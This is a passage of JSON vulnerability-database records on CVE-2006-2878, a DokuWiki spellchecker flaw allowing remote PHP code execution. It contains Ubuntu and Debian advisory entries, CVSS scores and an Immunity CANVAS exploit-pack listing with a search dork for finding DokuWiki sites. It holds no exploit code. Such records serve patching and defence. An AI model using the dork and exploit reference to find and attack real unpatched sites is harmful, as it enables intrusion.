"NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2878"], "modified": "2006-06-07T00:00:00", "id": "UB:CVE-2006-2878", "href": "https://ubuntu.com/security/CVE-2006-2878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debiancve": [{"lastseen": "2022-03-21T07:33:08", "description": "The spellchecker (spellcheck.php) in DokuWiki 2006/06/04 and earlier allows remote attackers to insert and execute arbitrary PHP code via \"complex curly syntax\" that is inserted into a regular expression that is processed by preg_replace with the /e (executable) modifier.", "cvss3": {}, "published": "2006-06-07T00:02:00", "type": "debiancve", "title": "CVE-2006-2878", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2878"], "modified": "2006-06-07T00:02:00", "id": "DEBIANCVE:CVE-2006-2878", "href": "https://security-tracker.debian.org/tracker/CVE-2006-2878", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:13", "edition": 3, "description": "**Name**| dokuwiki_exec \n---|--- \n**CVE**| CVE-2006-2878 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| DokuWiki Spell Checker Embedded Link Arbitrary PHP Code Execution \n**Notes**| CVE Name: CVE-2006-2878 \nVENDOR: DokuWiki \nRepeatability: Infinite \nReferences: ['http://www.hardened-php.net/advisory_042006.119.html'] \nCVSS: 7.5 \nDORK: ['Driven by DokuWiki'] \n\n", "cvss3": {}, "published": "2006-06-07T00:02:00", "title": "Immunity Canvas: DOKUWIKI_EXEC", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-2878"], "modified": "2006-06-07T00:02:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/dokuwiki_exec", "id": "DOKUWIKI_EXEC", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}